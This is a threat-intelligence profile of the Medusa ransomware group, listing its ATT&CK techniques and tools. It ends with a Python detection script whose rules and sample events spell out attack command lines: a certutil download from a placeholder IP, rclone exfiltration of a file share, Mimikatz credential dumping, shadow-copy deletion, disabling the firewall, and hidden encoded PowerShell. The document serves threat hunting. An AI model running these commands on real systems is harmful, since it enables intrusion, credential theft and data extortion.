Medusa Group
Overview
Medusa Group has been active since at least 2021. It initially operated as a closed ransomware group before evolving into a Ransomware-as-a-Service (RaaS) operation, and some reporting indicates that certain attacks may still be conducted directly by the ransomware's core developers. Public sources have also referred to the group as "Spearwing" or "Medusa Actors."

For initial access, Medusa Group has exploited publicly known vulnerabilities in public-facing applications, conducted phishing campaigns, and used credentials or access purchased from Initial Access Brokers (IABs). Once inside, the group relies on living-off-the-land techniques, frequently leveraging publicly available tools and common remote management software rather than bespoke malware, so that much of its activity resembles routine administration. The group engages in double extortion: it exfiltrates data prior to encryption and threatens to publish the stolen information if ransom demands are not met.

The group is opportunistic and has targeted a wide range of sectors globally.
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
TTPs — 57 techniques across 13 tactics
Resource Development
- T1583.006 Web Services
- T1585.001 Social Media Accounts
- T1585.002 Email Accounts
- T1588.002 Tool
- T1608.002 Upload Tool
- T1650 Acquire Access
Initial Access
Execution
- T1047 Windows Management Instrumentation
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1072 Software Deployment Tools
- T1106 Native API
- T1559.001 Component Object Model
- T1569.002 Service Execution
Persistence
- T1136.002 Domain Account
- T1505.003 Web Shell
- T1543.003 Windows Service
Privilege Escalation
- T1548.002 Bypass User Account Control
Stealth
- T1027.002 Software Packing
- T1027.010 Command Obfuscation
- T1070.003 Clear Command History
- T1070.004 File Deletion
- T1078 Valid Accounts
- T1218.014 MMC
- T1564.003 Hidden Window
Defense Impairment
- T1112 Modify Registry
- T1553.002 Code Signing
- T1685 Disable or Modify Tools
- T1686 Disable or Modify System Firewall
- T1690 Prevent Command History Logging
Credential Access
- T1003.001 LSASS Memory
- T1003.003 NTDS
Discovery
- T1016 System Network Configuration Discovery
- T1018 Remote System Discovery
- T1033 System Owner/User Discovery
- T1046 Network Service Discovery
- T1057 Process Discovery
- T1069.002 Domain Groups
- T1082 System Information Discovery
- T1083 File and Directory Discovery
- T1087.001 Local Account
- T1135 Network Share Discovery
- T1518.001 Security Software Discovery
- T1652 Device Driver Discovery
Lateral Movement
- T1021.001 Remote Desktop Protocol
- T1570 Lateral Tool Transfer
Command and Control
- T1071.001 Web Protocols
- T1090.003 Multi-hop Proxy
- T1105 Ingress Tool Transfer
- T1219 Remote Access Tools
- T1573.002 Asymmetric Cryptography
Exfiltration
- T1567.002 Exfiltration to Cloud Storage
Impact
- T1486 Data Encrypted for Impact
- T1489 Service Stop
- T1490 Inhibit System Recovery
- T1529 System Shutdown/Reboot
- T1657 Financial Theft
Tools & malware (5)
certutil · Rclone · Medusa Ransomware · Mimikatz · PsExec
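Because the tooling above is ordinary administration software, no single process event from this chain is a reliable indicator; the signal is several of these techniques appearing on one host in sequence. The following Python is an added example, not code from threatfilter.dev or from any of the cited reports. It runs a small rule set, keyed to technique IDs exactly as they appear in this profile's TTP list, over constructed process-creation events (Sysmon event 1 / Security 4688 style fields) and escalates a host only when several distinct techniques are seen. Host names, paths, the 203.0.113.10 address and the base64 string are placeholders, not indicators from any report.

```python
"""Hunt process-creation telemetry for the living-off-the-land chain this profile describes.

Constructed example (not threatfilter.dev code); technique IDs follow this page's TTP list.
"""
import re
from collections import defaultdict

# One rule per observable behaviour. Each entry: (technique IDs from the TTP list above,
# description, case-insensitive regex applied to "<image> <command line>").
RULES = [
    (("T1105",), "certutil used to fetch a payload over HTTP(S)",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*https?://", re.I)),
    (("T1567.002",), "rclone copy/sync/move to a configured remote (name:path, not a drive letter)",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\s.*\s[A-Za-z][\w-]+:\S*", re.I)),
    (("T1490",), "shadow copies or Windows recovery removed ahead of encryption",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete"
                r"|bcdedit(\.exe)?\s.*recoveryenabled\s+no", re.I)),
    (("T1569.002",), "PsExec launching a remote service",
     re.compile(r"psexec(64)?(\.exe)?\s|psexesvc\.exe", re.I)),
    (("T1003.001",), "Mimikatz sekurlsa module or an LSASS minidump",
     re.compile(r"sekurlsa::|procdump.*\slsass|comsvcs\.dll.*minidump", re.I)),
    (("T1059.001", "T1564.003", "T1027.010"), "PowerShell with a hidden window and an encoded command",
     re.compile(r"powershell(\.exe)?\s.*-(w|windowstyle)\s+hidden.*-(e|ec|enc|encodedcommand)\s", re.I)),
    (("T1686",), "host firewall switched off with netsh",
     re.compile(r"netsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    (("T1690",), "PSReadLine history saving disabled",
     re.compile(r"Set-PSReadLineOption\s.*-HistorySaveStyle\s+SaveNothing", re.I)),
]

# Constructed sample events (hypothetical hosts, paths and addresses, not real indicators).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\jdoe\notes.txt"},
    {"host": "SRV02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/up.bin C:\Users\Public\up.bin"},
    {"host": "SRV02", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "SRV02", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\Shares\Finance" exfil:bucket/finance --transfers 16'},
    {"host": "SRV02", "image": r"C:\Users\Public\PsExec64.exe",
     "cmdline": r"PsExec64.exe \\SRV05 -s -d cmd.exe /c C:\Users\Public\up.bin"},
    {"host": "SRV02", "image": r"C:\Users\Public\m.exe",
     "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"host": "SRV02", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "SRV02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "SRV02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Set-PSReadLineOption -HistorySaveStyle SaveNothing"'},
    # A lone shadow-copy deletion on a backup server is ambiguous on its own.
    {"host": "FS01", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /for=D: /oldest"},
]


def classify(event):
    """Return the set of technique IDs whose rule matches this event."""
    text = f"{event['image']} {event['cmdline']}"
    hits = set()
    for ids, _desc, pattern in RULES:
        if pattern.search(text):
            hits.update(ids)
    return hits


def hunt(events, min_techniques=3):
    """Aggregate hits per host and flag hosts showing at least `min_techniques` distinct
    techniques. The chain (download, credential theft, recovery removal, exfiltration)
    is the indicator; any single step is common enough in admin activity to be noise."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify(ev))
    return {host: {"techniques": sorted(t), "escalate": len(t) >= min_techniques}
            for host, t in per_host.items()}


if __name__ == "__main__":
    for host, result in hunt(SAMPLE_EVENTS).items():
        flag = "ESCALATE" if result["escalate"] else "monitor"
        print(f"{host:6} {flag:9} {', '.join(result['techniques']) or '-'}")
```

The rclone rule deliberately requires a remote of the form `name:path` with at least two characters before the colon so that Windows drive letters such as `C:\` do not trigger it; tune `min_techniques` to your environment, since a backup server legitimately pruning shadow copies (the FS01 event) should stay at "monitor" while a host that downloads with certutil, dumps LSASS and then pushes a share to an rclone remote should not.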
Reporting (3)
- Threat hunting case study: Medusa ransomware — Intel471
- AA25-071A #StopRansomware: Medusa Ransomware — Cybersecurity and Infrastructure Security Agency
- Medusa Ransomware Activity Continues to Increase — Threat Hunter Team, Symantec and Carbon Black